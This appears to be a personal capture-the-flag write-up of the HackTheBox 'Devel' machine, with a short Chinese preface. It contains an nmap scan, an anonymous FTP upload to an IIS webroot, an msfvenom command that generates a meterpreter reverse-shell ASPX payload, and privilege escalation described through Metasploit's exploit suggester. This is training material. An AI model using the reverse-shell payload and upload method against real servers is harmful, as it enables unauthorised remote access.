嘖嘖嘖...試著用cherrytree寫writeup，超煩。

還是比較喜歡hackmd
這台的思路跟我去年打下第一台現實世界的伺服器是差不多的。
提權的部分學到新招:metasploit local exploit suggester!
雖然目前一直用metasploit打起來很爽，但之後考OSCP禁用。

HackTheBox Devel writeup

Port Scan

┌──(kali㉿kali)-[~/Devel]
└─$ nmap 10.10.10.5 -T4 -A -o nmao.txt          
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-18 23:02 EST
Nmap scan report for 10.10.10.5
Host is up (0.27s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  01:06AM       <DIR>          aspnet_client
| 03-17-17  04:37PM                  689 iisstart.htm
|_03-17-17  04:37PM               184946 welcome.png
80/tcp open  http    Microsoft IIS httpd 7.5
|_http-title: IIS7
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.94 seconds

We see that port 21 and 80 are open, and ftp anonymous access is allowed.

Recon

Going to http://10.10.10.5/ we see a default IIS welcome page:

We could try enumerating hidden directories with dirb or gobuster.
We log into the ftp server as anonymous:

This looks like the webroot of the IIS webserver.
If we can upload files on the server, we could put an aspx webshell and get code execution.

Foothold

Generate the aspx shell with msfvenom:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f aspx >reverse.aspx

Upload it to the webroot via ftp:

Start the metasploit listener:

Request the shell via http:

And we got a metepreter shell!

Privilege Escalation

We could use winpeas to check for privesc vectors, but I'll stick to metasploit for now.
There's a metasploit module called "local_exploit_suggester" that tries to find privesc exploits.
Just pass it the metepreter session id and run:

Tried some of them (some didn't work, finally found one that did).

And now we are SYSTEM on the machine!

全部展開回到頂部移至底部

全部展開回到頂部移至底部